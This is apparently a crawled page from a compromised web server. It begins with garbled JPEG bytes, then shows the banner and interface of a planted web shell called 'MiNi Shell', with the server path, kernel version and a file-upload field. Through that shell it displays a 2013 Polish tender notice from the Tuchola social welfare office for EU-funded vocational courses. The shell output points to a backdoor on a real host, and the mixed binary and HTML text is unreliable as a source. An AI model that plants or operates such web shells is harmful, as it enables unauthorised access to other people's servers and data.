JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130611/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130611/107209-N-2013.html

<p class="kh_header"><b>Tuchola: Zorganizowanie i przeprowadzenie kursów w ramach projektu systemowego Uwierz w swoje możliwości</b><br>
<b>Numer ogłoszenia: 107209 - 2013; data zamieszczenia: 11.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Tucholi , ul. Świecka 45, 89-500 Tuchola, woj. kujawsko-pomorskie, tel. 52 334 89 50, faks 52 336 00 62.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops.tuchola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów w ramach projektu systemowego Uwierz w swoje możliwości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A) Przedmiotem postępowania o udzielenie zamówienia publicznego jest usługa zorganizowania i przeprowadzenia kursów zawodowych, zgodnie z poniższym zestawieniem:
część 1. kurs pn. Magazynier - operator wózków jezdniowych wraz z bezpieczną wymianą butli gazowych dla 6 osób;
część 2. kurs spawacza metodą MAG dla 9 osób;
część 3. kurs fryzjerski z elementami wizażu dla 6 osób;
część 4. kurs pn. Komputerowa obsługa sklepów i hurtowni z obsługą kasy fiskalnej dla 19 osób;
część 5 kurs:
BLOK I: Opiekun osób starszych, niepełnosprawnych i dzieci dla 5 osób;
BLOK II: Opiekun osób starszych, niepełnosprawnych i dzieci z modułem języka niemieckiego dla 8 osób.

Uczestnicy projektu, którzy będą brali udział w powyższych kursach, to łącznie 53 osoby, które są beneficjentami projektu systemowego pn. Uwierz w swoje możliwości, realizowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, POKL Priorytet VII Działanie 7.1 Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. Wśród uczestników są również osoby o różnym stopniu niepełnosprawności. 

B) Wymagania dotyczące realizacji przedmiotu zamówienia:
W ramach zamówienia Wykonawca zobowiązany będzie w szczególności do:
1. Przeprowadzenia poszczególnych kursów z podziałem na blok zajęć teoretycznych i praktycznych z zakresu danego kursu, przy czym blok zajęć praktycznych rozpoczyna się po bloku zajęć teoretycznych;
2. Zajęcia powinny odbywać się w ciągu, z wyłączeniem dni wolnych, tj. sobót, niedziel i świąt. Rozpoczęcie zajęć powinno odbywać się nie wcześniej niż od godziny 8.00, a kończyć najpóźniej o godzinie 16.00. Wykonawca zobowiązany jest do zapewnienia uczestnikom danego kursu przynajmniej 3 przerw: dwóch po 10-15 minut każda, oraz jednej, przynajmniej 20 min. (obiadowej).
3. Zajęcia teoretyczne muszą być prowadzone na terenie miasta Tuchola. Zajęcia praktyczne muszą się odbyć na terenie miasta lub gminy Tuchola, z zastrzeżeniem, iż dla części zamówienia nr 1 i 2 w zakresie przeprowadzenia zajęć praktycznych, gdzie oprócz terenu miasta lub gminy Tuchola, dopuszcza się prowadzenie zajęć na obszarze powiatów ościennych, tj. świeckiego, chojnickiego, człuchowskiego i sępoleńskiego. Jeśli zajęcia i/lub egzaminy odbywać się będą poza terenem miasta Tuchola, wówczas organizacja dowozu uczestników oraz koszty z tym związane (także ubezpieczenie NNW) pozostają po stronie Wykonawcy. Czas przejazdu nie jest czasem zajęć.
4. Wykonawca powinien zapewnić i dostosować odpowiednią ilość miejsc i jakość pomieszczeń do przeprowadzenia kursów oraz wyposażyć je w sprzęt i pomoce dydaktyczne, odpowiednie do pracy i nauki. Wykonawca zapewni uczestnikowi materiały szkoleniowe, przeznaczone na potrzeby kursów przyuczających do zawodu, które powinny zapewnić wysoki poziom merytoryczny, przejrzystość i spójność zawartych informacji oraz rzeczowość i kompleksowość. Wszyscy uczestnicy kursów muszą bezzwrotnie otrzymać materiały edukacyjne z logo EFS, przygotowane przez Wykonawcę, jeden egzemplarz materiałów szkoleniowych (najpóźniej w dniu rozpoczęcia kursów zawodowych) otrzymuje Zamawiający.
5. Materiały szkoleniowe oraz sale dydaktyczne muszą być oznakowane przez Wykonawcę, poprzez umieszczenie logotypów UE, EFS, POKL. Na drzwiach pomieszczenia, w którym odbywają się zajęcia Wykonawca musi umieścić oznakowanie z hasłem: W tym miejscu odbywa się kurs zawodowy  (pn. Magazynier - operator wózków jezdniowych wraz z bezpieczną wymianą butli gazowych, kurs spawacza metodą MAG, kurs fryzjerski z elementami wizażu pn. Komputerowa obsługa sklepów i hurtowni z obsługą kasy fiskalnej/ Opiekun osób starszych, niepełnosprawnych i dzieci, Opiekun osób starszych, niepełnosprawnych i dzieci z modułem języka niemieckiego), organizowany przez Ośrodek Pomocy Społecznej w Tucholi w ramach projektu pn. Uwierz w swoje możliwości, współfinansowanego przez Unię Europejską, w ramach Europejskiego Funduszu Społecznego. 
6. Osoby prowadzące zajęcia powinny posiadać odpowiednie kwalifikacje i umiejętności oraz doświadczenie zawodowe, a także powinny spełniać wymagania w tym zakresie, opisane w punkcie c Rozdziału VI SIWZ.
7. W ramach zamówienia, Wykonawca zobowiązany jest do przeprowadzenia badań specjalistycznych i profilaktycznych, stwierdzających zdolność uczestnika do odbycia danego kursu, o ile przepisy prawa tego wymagają.
8. W czasie przerw pomiędzy zajęciami dydaktycznymi, Wykonawca jest zobowiązany zapewnić pakiet socjalny uczestnikom poszczególnych kursów (w trakcie każdego dnia zajęć), składający się z:
a) napoje - kawa, herbata, śmietanka do kawy, cukier - bez ograniczeń, sok - 0,5 l/os., woda - 1 l/os.;
b) 2 kostki ciasta (ok. 7x5 cm), np. jabłecznik, ciasto z kremem, ciasto z galaretką i owocami;
c) obiad dwudaniowy, składający się z: zupy (350 ml), sztuki mięsa (150 g), ziemniaków/frytek/ryżu (200g), surówki ze świeżych warzyw (150 g), napoju w kartoniku z rurką (200 ml);
9. Wykonawca zobowiązany jest do ubezpieczenia uczestników kursów od następstw nieszczęśliwych wypadków, powstałych w trakcie trwania kursu oraz w drodze na zajęcia i powrotnej z zajęć do miejsca zamieszkania uczestnika na kwotę minimum 5.000,00 zł (słownie: pięć tysięcy złotych) - suma ubezpieczenia na osobę.
10. Kursy zawodowe powinny zakończyć się odpowiednim egzaminem, sprawdzającym zdobytą wiedzę teoretyczną i umiejętności praktyczne. Wykonawca powiadamia Zamawiającego o dacie, miejscu i godzinie egzaminu uczestników kursu.
11. Poszczególne kursy muszą zakończyć się wydaniem uczestnikom oryginału zaświadczenia lub certyfikatu, które muszą być opatrzone kolorowym logo Programu Operacyjnego Kapitał Ludzki i logo Unii Europejskiej, oraz zawierać informację: Projekt realizowany przez Ośrodek Pomocy Społecznej w Tucholi pn. Uwierz w swoje możliwości, współfinansowany ze środków Unii Europejskiej, w ramach Europejskiego Funduszu Społecznego, Priorytet VII Działanie 7.1, Poddziałanie 7.1.1. Uczestnicy kursu pn. Opiekun osób starszych, niepełnosprawnych i dzieci z modułem języka niemieckiego otrzymają oryginały zaświadczenia/certyfikatu w języku polskim i niemieckim.
Przez zakończenie szkolenia rozumie się sytuację, kiedy uczestnik projektu brał udział w minimum 80% zajęć danego kursu. Wykonawca zobowiązany jest do codziennego informowania Zamawiającego o nieobecnościach uczestników kursu, w czasie jego trwania.  Wykonawca nie dokonuje zwolnień oraz nie przyjmuje usprawiedliwień od uczestników kursu.
12. Wykonawca zapewnia każdemu uczestnikowi poszczególnych kursów odzież ochronną na zajęcia praktyczne.
13. Zamawiający zobowiązany jest do sporządzenia i przekazania Zamawiającemu w terminie do 3 dni roboczych po zakończeniu danego kursu:
a) kopii zaświadczeń lub certyfikatów;
b) kopii zaświadczeń, dokumentujących nabyte przez uczestników uprawnienia zawodowe - jeżeli kurs kończy się ich wydaniem;
c) oryginału rejestru wydanych zaświadczeń lub certyfikatów, potwierdzających ukończenie kursów i uzyskanie kwalifikacji oraz oryginału list potwierdzających odbiór zaświadczeń;
d) oryginału protokołu odbioru materiałów dydaktycznych przez uczestników kursów, potwierdzonych ich własnoręcznymi podpisami;
e) oryginału protokołu odbioru przez uczestników kursu pakietu socjalnego, opisanego w punkcie 8., potwierdzonego ich własnoręcznymi podpisami;
f) dziennika zajęć, zawierającego wymiar godzin, tematy zajęć (teoretycznych i praktycznych) oraz listy obecności uczestników (z każdego dnia kursu), potwierdzone ich własnoręcznymi podpisami;
g) kopie dokumentu, potwierdzającego ubezpieczenie uczestników od następstw nieszczęśliwych wypadków;
h) kopie zaświadczeń lekarskich z badań specjalistycznych i profilaktycznych, przeprowadzonych w ramach organizacji kursu (jeżeli dotyczy).
14. Wykonawca zobowiązuje się do ochrony danych osobowych uczestników kursów oraz przetwarzania tych danych tylko dla potrzeb prowadzenia określonego rodzaju zajęć.
15. Uczestnik nie ponosi żadnych kosztów za udział w kursie.

C) Zamawiający zastrzega sobie prawo zmiany liczby uczestników do +/- 1 osoby w każdej z części zamówienia (bez zmiany ceny za jedną osobę).

D)Zamawiający zastrzega sobie prawo do kontroli prowadzonych zajęć, w tym niezapowiedzianej przez uprawnione organy nadzoru i kontroli. Kontrola może zostać przeprowadzona zarówno w siedzibie Zamawiającego, w miejscu realizacji zajęć, jak i w innym miejscu określonym przez uprawniony podmiot dokonujący kontroli.

E) Po stronie Wykonawcy jest przygotowanie narzędzi do ewaluacji uczestników projektu, w postaci badań ankietowych przeprowadzonych przed i po zakończeniu danego kursu oceniających poziom osiągniętych rezultatów tj. poprawy uczestników projektu w sferze życia zawodowego oraz w celu szczegółowym: nabycia, podniesienia lub potwierdzenia przez nich kwalifikacji zawodowych wraz z raportem.

F) Wykonawca wykona i udokumentuje na płycie CD zdjęcia w ilości min. 15 sztuk z każdego kursu (fotorelacja z zajęć) oraz skompletuje oświadczenia uczestników dotyczących przetwarzania danych osobowych oraz udostępnienia wizerunku. Wykonawca przeniesie na Zamawiającego  prawa autorskie do zdjęć na wszystkich znanych w chwili zawarcia umowy polach eksploatacji w tym określonych w art. 50 ustawy z dnia 04.02.1994r., o prawie autorskim i prawach pokrewnych (tj. Dz. U. z 2006r., Nr 90 poz. 631 z późn. zm.). Niniejsze płyty oraz oświadczenia winny być przekazane Zamawiającemu w terminie do 7 dni po zakończeniu kursu.

G) Wykonawca zobowiązuje się do archiwizacji dokumentów dotyczących przebiegu kursu do 31.12.2020r. Wymóg ten związany jest z zapisami umowy ramowej dot. realizacji projektu w ramach Programu Operacyjnego Kapitał Ludzki.
H) Przedmiot zamówienia został podzielony na 5 odrębnych części. Wykaz części oraz ich opis zawiera załącznik nr 1 do SIWZ - opis przedmiotu zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający złoży odpowiednie oświadczenie o spełnieniu tego warunku. Wzór oświadczenia stanowi załącznik nr 3 do SIWZ.
Ocena spełnienia warunku zostanie sprawdzona na podstawie złożonego oświadczenia w formie weryfikacji ww. dokumentu, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej dwie usługi (potwierdzone dowodami, że usługi te zostały wykonane należycie), odpowiadające swoim rodzajem (rozumianym jako tematyka poszczególnych kursów) usługom stanowiącym poszczególne części zamówienia. 
Warunek dotyczy wszystkich części zamówienia i w przypadku składania ofert na kilka części zamówienia Wykonawca musi spełnić powyższy warunek dla każdej z części zamówienia odrębnie. 
	Ocena spełnienia warunku zostanie sprawdzona na podstawie analizy wykazu usług, z której musi wynikać, że Wykonawca wykonał przynajmniej dwie usługi(potwierdzone dowodami, że usługi te zostały wykonane należycie) odpowiadające swoim rodzajem (rozumianym jako tematyka poszczególnych kursów) usługom stanowiącym poszczególne części zamówienia. w formie weryfikacji ww. dokumentu, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający złoży odpowiednie oświadczenie o spełnieniu tego warunku. Wzór oświadczenia stanowi załącznik nr 3 do SIWZ.
Ocena spełnienia warunku zostanie sprawdzona na podstawie złożonego oświadczenia w formie weryfikacji ww. dokumentu, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dla każdej z części zamówienia dysponuje co najmniej jedną osobą (będącą wykładowcą/trenerem/instruktorem), która posiada odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie w dziedzinie, z której prowadzi zajęcia - przy czym przez doświadczenie zawodowe rozumnie się co najmniej jeden rok pracy na stanowisku odpowiednim do prowadzenia zajęć z określonej dziedziny (tematyki kursu) oraz przeprowadziła co najmniej dwa kursy i/lub szkolenia z zakresu/tematyki zgodnych z zajęciami/tematyką danego kursu w okresie ostatnich trzech lat przed upływem terminu składania ofert. 
Warunek dotyczy wszystkich części zamówienia i w przypadku składania ofert na kilka części zamówienia Wykonawca musi spełnić powyższy warunek dla każdej z części zamówienia odrębnie. 
	Ocena spełnienia warunku zostanie sprawdzona na podstawie analizy wykazu osób, które będą uczestniczyły w realizacji zamówienia, dla poszczególnych części i z którego treści musi wynikać, że osoby te posiadają odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie w dziedzinie, z której prowadzi zajęcia - przy czym przez doświadczenie zawodowe rozumnie się co najmniej jeden rok pracy na stanowisku odpowiednim do prowadzenia zajęć z określonej dziedziny (tematyki kursu) oraz przeprowadziła co najmniej dwa kursy i/lub szkolenia z zakresu/tematyki zgodnych z zajęciami/tematyką danego kursu w okresie ostatnich trzech lat przed upływem terminu składania ofert  w formie weryfikacji ww. dokumentu, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający złoży odpowiednie oświadczenie o spełnieniu tego warunku. Wzór oświadczenia stanowi załącznik nr 3 do SIWZ.
Ocena spełnienia warunku zostanie sprawdzona na podstawie złożonego oświadczenia w formie weryfikacji ww. dokumentu, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy
2. Pełnomocnictwo jest wymagane w przypadku gdy do reprezentowania Wykonawcy upoważniony jest pełnomocnik lub jeżeli oferta składana jest przez podmioty występujące wspólnie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany postanowień umowy w przypadkach, gdy:
a) nastąpi zmiana przepisów prawnych istotnych dla realizacji przedmiotu zamówienia, 
b) konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi wdrażanie Programu Operacyjnego Kapitał Ludzki, w ramach którego realizowane jest zamówienie.
c) konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej.
d) konieczność wprowadzenia zmian będzie następstwem zmian organizacyjnych po stronie Zamawiającego.
e) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego, wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć w chwili zawarcia umowy.
f) uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego.
g) zaistnieją okoliczności niezależne od Zamawiającego lub Wykonawcy, uzasadniające zmianę terminu realizacji przedmiotu zamówienia. 
h) zmiany wynagrodzenia za wykonanie zamówienia w przypadku rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy - w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia;

2. Zamawiający dopuszcza także zmianę osoby/osób prowadzącej/cych zajęcia w toku realizacji zamówienia, ale jedynie w uzasadnionych przypadkach, w szczególności na wypadek choroby lub innej okoliczności uniemożliwiającej osobie prowadzącej zajęcia wykonanie obowiązków wynikających z umowy. Zmiana osoby prowadzącej zajęcia wymaga uzyskania pisemnej zgody Zamawiającego oraz jest dopuszczalna pod warunkiem, że wskazana osoba (zastępca) posiada co najmniej takie same kwalifikacje i co najmniej takie samo doświadczenie zawodowe jak osoba wskazana w ofercie Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops.tuchola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Tucholi, ul. Świecka 45, 89-500 Tuchola.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2013 godzina 09:00, miejsce: Ośrodek Pomocy Społecznej w Tucholi, ul. Świecka 45, 89-500 Tuchola, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską ze Środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Piorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej oraz ze środków budżetu Ośrodka Pomocy Społecznej w Tucholi..</p>
